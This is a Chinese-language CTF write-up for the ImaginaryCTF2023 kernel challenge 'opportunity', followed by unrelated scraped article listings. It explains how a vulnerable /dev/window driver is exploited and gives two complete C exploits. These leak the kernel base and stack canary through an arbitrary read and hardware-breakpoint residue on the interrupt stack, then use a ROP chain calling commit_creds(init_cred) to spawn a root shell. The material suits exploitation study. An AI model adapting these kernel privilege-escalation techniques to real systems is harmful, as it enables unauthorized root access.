XiaozaYa
XiaozaYa

【无数次任意地址读+栈溢出】ImaginaryCTF2023 -- opportunity

前言

本题不难,但感觉笔者的做法挺有意思(嘿嘿,自夸啦),利用到了最近学到的 ret2hbp。

漏洞分析

保护:smap 等都开了,标配啦 >_<

漏洞是直给的:这里存在一个 256 字节的任意地址读,并且是无数次的

【无数次任意地址读+栈溢出】ImaginaryCTF2023 -- opportunity_第1张图片

【无数次任意地址读+栈溢出】ImaginaryCTF2023 -- opportunity_第2张图片

然后给了一个栈溢出:

【无数次任意地址读+栈溢出】ImaginaryCTF2023 -- opportunity_第3张图片

这里IDA识别的偏移有问题,最后调试看一下或者看汇编也可以看出来偏移

漏洞利用

泄漏 koffset:

         这里直接利用任意读读取 IDT table(即之前 SCTF 中的 cpu_entry_area mapping) 从而泄漏 koffset

泄漏 kcanary:

        想要进行栈溢出提权,首先的泄漏 kcanary,因为可以看出来题目是开了 kcanary 的。这里有两种方式:

                 1)任意读遍历 init_task 的 tasks 链表找到当前进程从而泄漏 kcanary

                 2)利用硬件断点中断栈残余的内核栈地址直接读取内核栈中的 kcanary

 栈溢出布置 ROP 提权:

        这里就比较常规了,主要就是注意下 kcanary 的偏移啥的还是调试一下比较稳

exp 如下:笔者泄漏 kcanary 采用的第二种方式

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int fd;
size_t koffset;
size_t pop_rdi = 0xffffffff8101d675; // pop rdi ; ret
size_t commit_creds = 0xffffffff810ff8a0;
size_t init_cred = 0xffffffff8308b2e0;
size_t swapgs_kpti = 0xffffffff820010f0;

struct request {
        char* ptr;
        char buf[1];
};

void arb_read(struct request* req) { ioctl(fd, 0x1337, req); }
void stack_overflow(char* buf, size_t len) { write(fd, buf, len); }

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

#define DR_OFFSET(dr) ((void*)(&((struct user*)0)->u_debugreg[dr]))

int rop_pipe[2];
char hbp_buf[0x1000];
char rop_buf[0x1000];

void set_hbp(pid_t pid, void* addr)
{
        if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr))
                err_exit("FAILED to set dr0");

        long dr7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);
        if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), dr7))
                err_exit("FAILED to set dr7");
}

int main(int argc, char** argv, char** env)
{
        save_status();
        fd = open("/dev/window", O_RDWR);
        if (fd < 0) err_exit("open dev file");

        pipe(rop_pipe);
        pid_t pid = fork();
        if (!pid)
        {
                if (ptrace(PTRACE_TRACEME, 0, NULL, NULL)) err_exit("FAILED to trace_me");
                raise(SIGSTOP);
                uname(hbp_buf);
                read(rop_pipe[0], rop_buf, 0x500);
                stack_overflow(rop_buf, 0x50+0x70);
                puts("CHILD OVER");

                exit(0);
        } else if (pid < 0) {
                err_exit("FAILED to fork a child process");
        }

        int status;
        waitpid(pid, &status, 0);
        set_hbp(pid, hbp_buf);

        if (ptrace(PTRACE_CONT, pid, NULL, NULL)) err_exit("FAILED to ptrace_cont");

        char buf[0x1000];
        struct request* req = (struct request*)buf;

        memset(buf, 0, sizeof(buf));
        req->ptr = 0xfffffe0000000000+4;
        arb_read(req);
        binary_dump("ARB DATA", req->buf, 0x100);
        koffset = *(size_t*)req->buf - 0xffffffff82008e00;
        hexx("koffset", koffset);

        memset(buf, 0, sizeof(buf));
        req->ptr = 0xfffffe0000010fb0 + 8*8;
        arb_read(req);
        binary_dump("ARB DATA", req->buf, 0x20);
        size_t kstack = *(size_t*)req->buf;
        hexx("kstack", kstack);

        memset(buf, 0, sizeof(buf));
        req->ptr = kstack;
        arb_read(req);
        binary_dump("ARB DATA", req->buf, 0x100);
        size_t kcanary = -1;
        for (int i = 0; i < 0x100 / 8; i++)
        {
                size_t val = *(size_t*)(&req->buf[i*8]);
                if ((val&0xffff000000000000) != 0xffff000000000000 && (val&0xff) == 0 && (val&0xff00) != 0 && val > 0x1000000000000000)
                {
                        kcanary = val;
                        break;
                }
        }
        if (kcanary == -1) err_exit("Leak kcanary");
        hexx("kcanary", kcanary);

        pop_rdi += koffset;
        init_cred += koffset;
        commit_creds += koffset;
        swapgs_kpti += koffset + 0x36;
        hexx("pop_rdi", pop_rdi);
        hexx("init_cred", init_cred);
        hexx("commit_creds", commit_creds);
        hexx("swapgs_kpti", swapgs_kpti);

        size_t rop[] = {
                kcanary,0,
                pop_rdi,
                init_cred,
                commit_creds,
                swapgs_kpti,
                0,0,
                get_root_shell,
                user_cs,
                user_rflags,
                user_sp,
                user_ss
        };
        memset(buf, 0, sizeof(buf));
        memcpy(buf+0x40, rop, sizeof(rop));
        write(rop_pipe[1], buf, 0x500);

        while(1) {}
        return 0;
}

效果如下:

【无数次任意地址读+栈溢出】ImaginaryCTF2023 -- opportunity_第4张图片

=========================================================================

思考了一下,上面用了三次任意地址读,但是其实两次就足够泄漏 koffset 和 kcanary 了, 因为中断栈上不止残留的栈地址,而且还残留了之前的 rip,如果是内核函数触发的硬件中断,那么 rip 就是一个内核地址,所以可以在泄漏 kstack 的时候同时泄漏 koffset。

exp 如下:只需要两次任意地址读

#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int fd;
size_t koffset;
size_t pop_rdi = 0xffffffff8101d675; // pop rdi ; ret
size_t commit_creds = 0xffffffff810ff8a0;
size_t init_cred = 0xffffffff8308b2e0;
size_t swapgs_kpti = 0xffffffff820010f0;

struct request {
        char* ptr;
        char buf[1];
};

void arb_read(struct request* req) { ioctl(fd, 0x1337, req); }
void stack_overflow(char* buf, size_t len) { write(fd, buf, len); }

void err_exit(char *msg)
{
    printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
    sleep(5);
    exit(EXIT_FAILURE);
}

void info(char *msg)
{
    printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}

void hexx(char *msg, size_t value)
{
    printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}

void binary_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *) addr;
    uint8_t *buf8 = (uint8_t *) addr;
    if (desc != NULL) {
        printf("\033[33m[*] %s:\n\033[0m", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf("  %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf("                   ");
        }
        printf("   ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* root checker and shell poper */
void get_root_shell(void)
{
    if(getuid()) {
        puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
        sleep(5);
        exit(EXIT_FAILURE);
    }

    puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");
    puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");

    system("/bin/sh");

    /* to exit the process normally, instead of segmentation fault */
    exit(EXIT_SUCCESS);
}

/* userspace status saver */
size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    asm volatile (
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        "pushf;"
        "pop user_rflags;"
    );
    puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

#define DR_OFFSET(dr) ((void*)(&((struct user*)0)->u_debugreg[dr]))

int rop_pipe[2];
char hbp_buf[0x1000];
char rop_buf[0x1000];

void set_hbp(pid_t pid, void* addr)
{
        if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(0), addr))
                err_exit("FAILED to set dr0");

        long dr7 = (1<<0)|(1<<8)|(1<<16)|(1<<17)|(1<<18)|(1<<19);
        if (ptrace(PTRACE_POKEUSER, pid, DR_OFFSET(7), dr7))
                err_exit("FAILED to set dr7");
}

int main(int argc, char** argv, char** env)
{
        save_status();
        fd = open("/dev/window", O_RDWR);
        if (fd < 0) err_exit("open dev file");

        pipe(rop_pipe);
        pid_t pid = fork();
        if (!pid)
        {
                if (ptrace(PTRACE_TRACEME, 0, NULL, NULL)) err_exit("FAILED to trace_me");
                raise(SIGSTOP);
                uname(hbp_buf);
                read(rop_pipe[0], rop_buf, 0x500);
                stack_overflow(rop_buf, 0x50+0x70);
                puts("CHILD OVER");

                exit(0);
        } else if (pid < 0) {
                err_exit("FAILED to fork a child process");
        }

        int status;
        waitpid(pid, &status, 0);
        set_hbp(pid, hbp_buf);

        if (ptrace(PTRACE_CONT, pid, NULL, NULL)) err_exit("FAILED to ptrace_cont");

        char buf[0x1000];
        struct request* req = (struct request*)buf;

        memset(buf, 0, sizeof(buf));
        req->ptr = 0xfffffe0000010fb0 + 5*8;
        arb_read(req);
        binary_dump("ARB DATA", req->buf, 0x100);
        size_t koffset = *(size_t*)req->buf - 0xffffffff817895a8;
        size_t kstack = *(size_t*)(req->buf + 24);
        hexx("koffset", koffset);
        hexx("kstack", kstack);

        memset(buf, 0, sizeof(buf));
        req->ptr = kstack;
        arb_read(req);
        binary_dump("ARB DATA", req->buf, 0x100);
        size_t kcanary = -1;
        for (int i = 0; i < 0x100 / 8; i++)
        {
                size_t val = *(size_t*)(&req->buf[i*8]);
                if ((val&0xffff000000000000) != 0xffff000000000000 && (val&0xff) == 0 && (val&0xff00) != 0 && val > 0x1000000000000000)
                {
                        kcanary = val;
                        break;
                }
        }
        if (kcanary == -1) err_exit("Leak kcanary");
        hexx("kcanary", kcanary);

        pop_rdi += koffset;
        init_cred += koffset;
        commit_creds += koffset;
        swapgs_kpti += koffset + 0x36;
        hexx("pop_rdi", pop_rdi);
        hexx("init_cred", init_cred);
        hexx("commit_creds", commit_creds);
        hexx("swapgs_kpti", swapgs_kpti);

        size_t rop[] = {
                kcanary,0,
                pop_rdi,
                init_cred,
                commit_creds,
                swapgs_kpti,
                0,0,
                get_root_shell,
                user_cs,
                user_rflags,
                user_sp,
                user_ss
        };
        memset(buf, 0, sizeof(buf));
        memcpy(buf+0x40, rop, sizeof(rop));
        write(rop_pipe[1], buf, 0x500);

        while(1) {}
        return 0;
}

效果如下:

【无数次任意地址读+栈溢出】ImaginaryCTF2023 -- opportunity_第5张图片

你可能感兴趣的:(kernel-pwn,任意读+栈溢出)

  • 读思001 ‖ 变负能为正能,变压力为动力 你不懂夜的黑
    今天起开始写一个言说文集连载,重点为读写思考收获和感想,也收录生活和工作中开悟到的点滴,仍然是一个碎片式的思考积累。希望这样的思考能启迪我的生活智慧,开悟我的思想境界,也算是一个修心的过程吧。这个连载不定期更新,重在积累生活和工作中的随思碎思,或许也是一厢情愿的一个梦。也或许这个梦是我坚持说下去的一个重要理由。读思001变负能为正能,变压力为动力1从来没有一种哲学能解决一切问题,也从来没有一种药能
  • 读史明智:龚遂展现了循吏的操守和能力 逆熵成长
    网图侵删读《资治通鉴·汉纪十七》和《汉书·循吏传》,看到历经刘贺、刘病已两任老板的龚遂,都得到了老板信任。对昏庸无能的刘贺,坚持操守敢于直言;在宣帝重用时,有勇有谋,让百姓饥馑,盗贼并起的渤海得到了治理,从中可见循吏的本色。01多次力谏刘贺,终免一死龚遂因通晓经术而担任官职,官至昌邑国郎中令,侍奉昌邑王刘贺。刘贺行为不端,龚遂为人忠厚,性格刚毅临难不苟,他在府内规劝刘贺,在府外指责傅相,援引经义,
  • 浇灌根部 山静幽兰
    “浇灌根部。”对,浇灌根部。张学青点醒了我。无论是我自己,还是我学生,都,正需要浇灌。正因为虚度了那么多岁月,不曾懂得浇灌自己,我这棵树才长得如此缓慢,四十多岁才长成今天这个样子。好在我现在的学生还小,犹如一棵棵小芽,浇灌正是时候。是的,要浇就浇根部。我的根,在课堂。根在课堂,就认认真真读书,读有“盐”的书,长智的书。以前也常看那些抚慰灵魂的“心灵鸡汤”,但时间长了觉得发腻,对我的语文教学也帮不了
  • 【转载】SSD测试第一神器——FIO running_sheep
    转自:[http://www.ssdfans.com]对于SSD性能测试来说,最好的工具莫过于FIO了。FIO是Jens开发的一个开源测试工具,功能非常强大,本文就只介绍其中一些基本功能。线程,队列深度,Offset,同步异步,DirectIO,BIO使用FIO之前,首先要有一些SSD性能测试的基础知识。线程指的是同时有多少个读或写任务在并行执行,一般来说,CPU里面的一个核心同一时间只能运行一个
  • #D174-读书会作业-《财务自由之路》3 白洲笔记
    最近沉迷于写作营,一直就没时间去弄读书会的作业,书的第二遍也就看了个开头,趁着日更的时间,赶紧把作业做了,这次是15到21课。【1.印象最深刻的部分】(本周所读内容中印象最深刻的部分)*活在未来,最正确的方法是什么?用正确的方法做正确的事情,判断什么是正确的?逻辑。学会思考。"作对事情"永远比“把事情作对“重要的多。”长远思考,耐心验证,小心总结提炼“证明自己正确并不是学习的任务和目标,时刻成长,
  • 认识一个金苹果(一) 紫藤11
    群里来了一个有趣的人,很喜欢她的有才和有趣,就是嘴碎点,很好奇,她是男生?还是女生?是90后?还是80后,太多疑问,但我又不想问她,只在群里跟她斗嘴,享受这个过程。跟她斗嘴的过程,跟我跟我儿子一样,总是抬杠,但又喜欢。不管她是男生还是女生,她的文采真是很好,看她的文章,直接有读下去的欲望,有想看续集的想法,她很努力向上,也很有荣誉感,但又不想让别人看穿,总是一个吊儿郎当的样子。明明跟同桌,那么友爱
  • 过去一年,这16本好书不容错过 m0_54050778 perl
    编者按:2023年在动荡与希望中收尾,2023年注定会被载入史册。疫情寒冬结束,ChatGPT横空出世,带动了人工智能技术的飞速发展;淄博烧烤、天津大爷、尔滨之旅等充满感动与幸福。但与此同时,2023年又是动荡与不安的一年,俄乌冲突的延宕,新一轮的巴以冲突,极端天气频发。在这个大环境下,有一些经典的书籍著作诞生。本文将分享2023年最值得一读的16本书籍,文章来自翻译,希望对你有所启示。关于202
  • 忙忙碌碌才是生活 北渔说
    观海年后上班,因为项目接近尾声甚是消闲。说是消闲,其实身消闲,心不消闲。都说当下社会是焦虑的社会,因为人们普遍焦虑。上班已有半月,想想这好像是上班几年来最空闲的一段时间了。空闲的主要原因是工作处在了瓶颈期,心有余而力不足。因为有一颗力求完美的心,但却没有力求完美的能力,所以徒有焦虑。不知道大家有没有这种感觉,在高压学习或工作一段时间之后,突然闲下来就会茫然无措。有时候读一本长篇,好不容易结束本来应
  • Python | Redis工具类 -拟墨画扇- Pythonredis数据库缓存python
    一、需求自动连接Redis数据库,通过连接池处理数据对输出结果进行Log打印并保存到文件二、代码Utils.redisUtils.py#!/usr/bin/envpython#-*-coding:utf-8-*-importredisfromUtils.loggerimportlog"""Redis数据格式(1)字符串|存储形式:key-value:str-存储二进制数据:可以存储任意类型的数据,
  • 2021-11-07 Mango_Mili_88
    平时努力打拼,到了周末不妨卸下肩上的重担,泡一杯清茶,读一本好书,做做喜欢的运动,听听舒缓的音乐,让心情回归轻松平静,让身体重新积蓄能量。劳逸结合,张弛有度,才能更加游刃有余。周日,早安!开心就好(✪✪加油(ง•̀_•́)ง
  • 一分钟读小说‖铅笔的告白 李子默_
    我今天在画画的时候,突然听到了一阵不大不小的啜泣声。我害怕。只敢慢慢抬起头用余光扫了一下桌面。“砰”“哎呀”我的鼻子被一块软软的东西撞了一下。原来是消失已久的橡皮泥呀!“小东西你干嘛呀?”“主人小姐姐,铅笔哥哥快要死掉了。”橡皮泥焦急的喊道。“啊?”“铅笔哥哥说要娶我,他说他要写出一封全世界最动人的情书再来向我求婚,于是他偷偷翻开了主人的《我不喜欢这个世界,我只喜欢你》,把F君所有的情话都抄下来了
  • 读《班主任工作漫谈》随笔(八) 不负韶华365
    魏老师所教班级的学生都有写日记的习惯。因为魏老师认为,有了日记指导,才使学生人生的航船,不至于在个人的小河沟打转,而把他导向更广阔的人生,导向社会,导向世界,才使它真正起到道德长跑的作用。日记,当然有一部分内容要谈到自我,但魏老师力求使学生认识到那是一个比昨天更新的自我,认识到一个比昨天更广阔的自我世界。十多年来,魏老师曾几十次引导学生写两个自我的日记。写这两个自我是怎样就某件事展开争论的。有时请
  • 育儿小课堂:如何尽早培养孩子良好的阅读习惯? 嘉宁麻麻
    对于培养阅读习惯有多种建议,下面介绍几种轻松实用的建议。阅读部分一,创建阅读仪式:留出一段特别的时间作为每日读书时间,把和孩子一起选“每日一书”变成惯例,然后坐在一个专门的位置读书。二,依偎:找一个安静、舒适的地方读书,让孩子紧紧依偎着你,也可以让孩子拿着一个喜爱的玩具,或者是揽着他喜爱的被子。三,富有表情地读:注意韵律和节奏,每个角色用不同声音,不要用“娃娃腔”。家庭环境部分:四,眼里有书:家里
  • [技巧] 全排列问题的五种解法 喜欢迈巴赫的将军 算法
    一、全排列问题定义:给任意个元素,求解所有可能得排列方式解法一//数比较少可以用暴力循环求解。intmain(){inti,j,k;for(i=1;i0{cnts[i]--acc[pos]=byte('a'+i)dfs(acc,pos+1)cnts[i]++}}}acc:=make([]byte,len(goods))dfs(acc,0)returnans}
  • 遇见美好|期待越来越好的自己|复盘日记Day137 沫ma的1001页
    遇见美好|期待越来越好的自己|复盘日记Day1372021年7月21日星期三晴喜马拉雅(沫沫成长记)亲子共读:Day42阅读学习践行Day.17/21晨间日记Day.17/21昨日晚安:23:02今日早安:05:00早起:Day806❥今日运动|跑步0Km(未完成)❥今日自我成长|学习新知识1.听书+书写笔记,小花生阅读打卡2..阅读学习,听音频+写作业3.时间管理2.0线上践行,听课+写作业4.
  • 为什么 /proc/meminfo 节点获取的 MemTotal 小于物理内存 源码注释器 笔记linux
    系统启动过程中打印的内存容量524288K(512M)跟物理内存容量一致Memory:489736K/524288Kavailable(9216Kkernelcode,685Krwdata,1896Krodata,1024Kinit,170Kbss,18168Kreserved,16384Kcma-reserved)开机后,读节点返回的内存容量小于512Mcat/proc/meminfoMemTo
  • 湘容儿成长日记第744天之只要不放弃,终究会遇见 墨mo晴
    2020年10月30号亲子共读地點:床边亲子共读时间:晚上亲子共读时长:35分钟亲子共读内容:芭比姐妹与小马、芭比之完美圣诞、三字经045-047今天收获还是很大,因为我解决了一个一直没有解决的问题。那就是我的手机内存。我的手机是64G的,界面上看到的软件又没有太多的东西被我删了,又删手机里面的图片,竟然没有50张。可就是经常的提醒我内存不足,内存不足。我和同事一起探讨过,我和我先生说过,可是终究
  • 荷塘夜色 开在夏末的花立在他山之石
    葉子,水墨画读已经一周了,每天都有好的文章可以阅读。与志同道合的同伴一起分享创作,是一件快乐的事,在成长的路上,坚持阅读,坚持绘画,做更好的自己。
  • Ⅴ爱阅读,亲子互动——打卡第197天 郭小郭0830
    今天读《神奇数字123》,小熊很忙系列《小小宇航员》,《妈妈看从1到10》上午要去取快递和换面粉,不管怎么闹,一说坐车立马高兴!于是乎~上车走之~车开出去还没五分钟,没动静呢?一看早睡着了……脑袋里想到一个词“集贩子庙旋子”,大意就是爱凑热闹的很!下午妈妈和姥爷收拾院子,傍晚有点犯困的时候闹点气,不过小姨抱着一会儿就睡着了。等醒的时候,这个哭啊,哼哼唧唧了一个小时,抱了一个小时,其中抱着的时候尿湿
  • 张爱玲。论吃与画饼充饥 2013-2-14 18:41 阅读(15) 何青猊
    张爱玲。论吃与画饼充饥出门在外,吃确实是大问题。小时候引以为傲的一点,我毫不挑食,哪里的大学都可以去读--------我确实毫不挑食,只是一出浙江就水土不服。粤菜和我们家乡的菜肴差异并不很大。无奈香港的中餐快餐化的不彻底(因为快餐市场以为西方东瀛南亚菜式挤占的缘故?),类似于我们的快餐店的只有taste里的一个摊位,透明的玻璃罩十几道菜整齐码好,戴白帽的阿姨一手拿食盒一手拿锅铲,“要哪样?要哪样?
  • 战时灯火(读客熊猫君出品。诺贝尔奖得主石黑一雄熟读到可以背出来的书!布克奖50周年大奖“金布克奖”得主翁达杰!)2019-06.epub x1y2019
    下载地址:战时灯火(读客熊猫君出品。诺贝尔奖得主石黑一雄熟读到可以背出来的书!布克奖50周年大奖“金布克奖”得主翁达杰!)2019-06.epub
  • 专注,抗干扰能力强但适应干扰能力弱 相诚以待乡
    一直觉得儿子专注力还可以,自小,玩一样东西的时候,很投入,经常你喊他都听不到,而且会一直坚持到底。不过最近发现,就是因为专注,一旦遇到了干扰,适应干扰的能力非常弱。比如,今天早上我早起带他早读,原本是一课一句句读下来的,读了几遍后,我说咱们分角色读吧,语言是用来交流的,它一定是在某个场景中,他竟然很抗拒,说不行,问为什么不行也不说,反正就是不读。我说你们在学校学语文也是这样的,不也有分角色朗读吗?
  • 读书思考 乡村追梦人
    一小兔子上二年级,能够自主的阅读一般的没有拼音的书籍。最近读一套可怕的科学系列的书。科普类的书籍,有部分字不认识。开始,孩子碰到不认识的字,就向我们问。我了解她学了查字典,就让她通过字典去认字。后来,妈妈认为查字典影响阅读的速度,打断对阅读的理解。妈妈建议去猜测不认识的字,阅读完后再查字典。我们还给孩子建议,识字不识字,先认半个字。用半个字去猜测读音。我在听孩子读书的时候,发现有好几个字都读错,而
  • 【No.15】蓝桥杯动态规划上|最少硬币问题|0/1背包问题|小明的背包1|空间优化滚动数组(C++) ChoSeitaku 蓝桥杯备考蓝桥杯动态规划c++
    DP初步:状态转移与递推最少硬币问题有多个不同面值的硬币(任意面值)数量不限输入金额S,输出最少硬币组合。回顾用贪心求解硬币问题硬币面值1、2、5。支付13元,要求硬币数量最少贪心:(1)5元硬币,2个(2)2元硬币,1个(3)1元硬币,1个硬币面值1、2、4、5、6.,支付9元。贪心:(1)6元硬币,1个(2)2元硬币,1个(3)1元硬币,1个错误!答案是:5元硬币+4元硬币=2个硬币问题的正解
  • 读《城南旧事》有感 七5班李昊鑫
    莎士比亚说:“书籍是人类知识的总结,书籍是全世界的营养品。”多读书,读好书学习才能进步。最近我读完了一本书,《城南旧事》,虽然书早已读完,但书里的那一幕幕仍然在我的脑海中闪烁着,让我难以忘怀………图片发自App这本书是作者林海英根据自己的亲身经历和感受而写的怀念家乡的作品。作者以自己7岁到13岁的童年生活作为故事背景,通过主人公小英子的眼睛来讲述了自己在老北京胡同的人和事。我比较喜欢主人公小英子,
  • HBase入门教程 xmvip01
    1.1Hbase概念术语1、行键RowKey:主键是用来检索记录的主键,访问hbasetable中的行。2、列族ColumnFamily:Table在水平方向有一个或者多个ColumnFamily组成,一个ColumnFamily中可以由任意多个Column组成,即ColumnFamily支持动态扩展,无需预先定义Column的数量以及类型,所有Column均以二进制格式存储,用户需要自行进行类型
  • 【利平成长日记】第583天 张利平专注国学教育139876
    五好家庭,从我做起!(2021.1.5打卡第547天)“存好心读好书说好话行好事做好人”五句良言:一.早上好,一天愉快。二.一天辛苦了,今天开心吗?三.晚安,好梦。四.我们想干什么,你看可以吗?五.有你真好。【念父母的好】感恩双方父母身体健康,你们身体好是我们最大的幸福!家里天气冷,你们注意保暖。【念爱人的好】亲爱的,你是最伟大的老公,谢谢这么多年对我的照顾,对家庭的付出,让我们生活中温暖的家庭里
  • 《数字时代的学与教》第二模块共读心得 屏山郑艳榕
    前五讲的共读让我确立了“以生为本”的教学理念,后五讲的共读让我了解如何将这个理念落到实处。有了麻吉星这套好用的教学工具,我们可以实时收集学生数据,了解学情,获得丰富的学生生成性教学资源,而如何基于资源实施教学,让学生真正有所得则需要教师的智慧。小组活动是科学课堂上经常使用到的教学方法,但是以往我在组织小组活动时常常发现部分能力强的同学包办了一切,而能力弱的学生没有得到锻炼,最终不会的还是不会。通过
  • 小时候的事,你记得哪些 季沫之夏
    不知道是不是大多数人都能记住小时候的事情,多小呢,三岁时在幼儿园的事,或者小学在家里发生的事。我就记不住,大概从小记性就不好,很多小时候的事,都是爸爸妈妈在我耳朵说几百遍才记起来。其实也不是记起来,我也不知道是不是真的发生过,但是爸妈说的让我觉得确实是有这么回事。我能记起来最小的事,就是四年级升五年级的事,那时候合并小学,另一个村里的学生都转到我们学校读五年级,其实整个班里也就三十多不到四十个学生
  • 规划个人成长路径 知意zy
    请你运用自由书写的方式,谈一谈你如何在读书这个领域持续成长?著名文学翻译家许渊冲曾说:“生命不是你活了多少日子,而是你记住了多少日子,要让你过的每一天,都值得记忆。”读书对于我而言,更胜一种亲人的陪伴。记得那时读中专的时候,我喜欢乱花父母给的生活费,遇到没有钱吃饭的囧状,就买来几个硬邦邦的馒头沾着番茄酱在宿舍床上吃。一边吃一边津津有味地看长篇言情小说,完全沉浸在阅读书籍的乐趣之中,直到一天过去。现
  • 关于旗正规则引擎中的MD5加密问题 何必如此 jspMD5规则加密
    一般情况下,为了防止个人隐私的泄露,我们都会对用户登录密码进行加密,使数据库相应字段保存的是加密后的字符串,而非原始密码。 在旗正规则引擎中,通过外部调用,可以实现MD5的加密,具体步骤如下: 1.在对象库中选择外部调用,选择“com.flagleader.util.MD5”,在子选项中选择“com.flagleader.util.MD5.getMD5ofStr({arg1})”; 2.在规
  • 【Spark101】Scala Promise/Future在Spark中的应用 bit1129 Promise
    Promise和Future是Scala用于异步调用并实现结果汇集的并发原语,Scala的Future同JUC里面的Future接口含义相同,Promise理解起来就有些绕。等有时间了再仔细的研究下Promise和Future的语义以及应用场景,具体参见Scala在线文档:http://docs.scala-lang.org/sips/completed/futures-promises.html
  • spark sql 访问hive数据的配置详解 daizj spark sqlhivethriftserver
    spark sql 能够通过thriftserver 访问hive数据,默认spark编译的版本是不支持访问hive,因为hive依赖比较多,因此打的包中不包含hive和thriftserver,因此需要自己下载源码进行编译,将hive,thriftserver打包进去才能够访问,详细配置步骤如下:   1、下载源码   2、下载Maven,并配置 此配置简单,就略过
  • HTTP 协议通信 周凡杨 javahttpclienthttp通信
                            一:简介  HTTPCLIENT,通过JAVA基于HTTP协议进行点与点间的通信!     二: 代码举例      测试类: import java
  • java unix时间戳转换 g21121 java
    把java时间戳转换成unix时间戳: Timestamp appointTime=Timestamp.valueOf(new SimpleDateFormat("yyyy-MM-dd HH:mm:ss").format(new Date())) SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd hh:m
  • web报表工具FineReport常用函数的用法总结(报表函数) 老A不折腾 web报表finereport总结
    说明:本次总结中,凡是以tableName或viewName作为参数因子的。函数在调用的时候均按照先从私有数据源中查找,然后再从公有数据源中查找的顺序。   CLASS CLASS(object):返回object对象的所属的类。   CNMONEY CNMONEY(number,unit)返回人民币大写。 number:需要转换的数值型的数。 unit:单位,
  • java jni调用c++ 代码 报错 墙头上一根草 javaC++jni
    # # A fatal error has been detected by the Java Runtime Environment: # #  EXCEPTION_ACCESS_VIOLATION (0xc0000005) at pc=0x00000000777c3290, pid=5632, tid=6656 # # JRE version: Java(TM) SE Ru
  • Spring中事件处理de小技巧 aijuans springSpring 教程Spring 实例Spring 入门Spring3
    Spring 中提供一些Aware相关de接口,BeanFactoryAware、 ApplicationContextAware、ResourceLoaderAware、ServletContextAware等等,其中最常用到de匙ApplicationContextAware.实现ApplicationContextAwaredeBean,在Bean被初始后,将会被注入 Applicati
  • linux shell ls脚本样例 annan211 linuxlinux ls源码linux 源码
    #! /bin/sh - #查找输入文件的路径 #在查找路径下寻找一个或多个原始文件或文件模式 # 查找路径由特定的环境变量所定义 #标准输出所产生的结果 通常是查找路径下找到的每个文件的第一个实体的完整路径 # 或是filename :not found 的标准错误输出。 #如果文件没有找到 则退出码为0 #否则 即为找不到的文件个数 #语法 pathfind [--
  • List,Set,Map遍历方式 (收集的资源,值得看一下) 百合不是茶 listsetMap遍历方式
    List特点:元素有放入顺序,元素可重复 Map特点:元素按键值对存储,无放入顺序 Set特点:元素无放入顺序,元素不可重复(注意:元素虽然无放入顺序,但是元素在set中的位置是有该元素的HashCode决定的,其位置其实是固定的) List接口有三个实现类:LinkedList,ArrayList,Vector LinkedList:底层基于链表实现,链表内存是散乱的,每一个元素存储本身
  • 解决SimpleDateFormat的线程不安全问题的方法 bijian1013 javathread线程安全
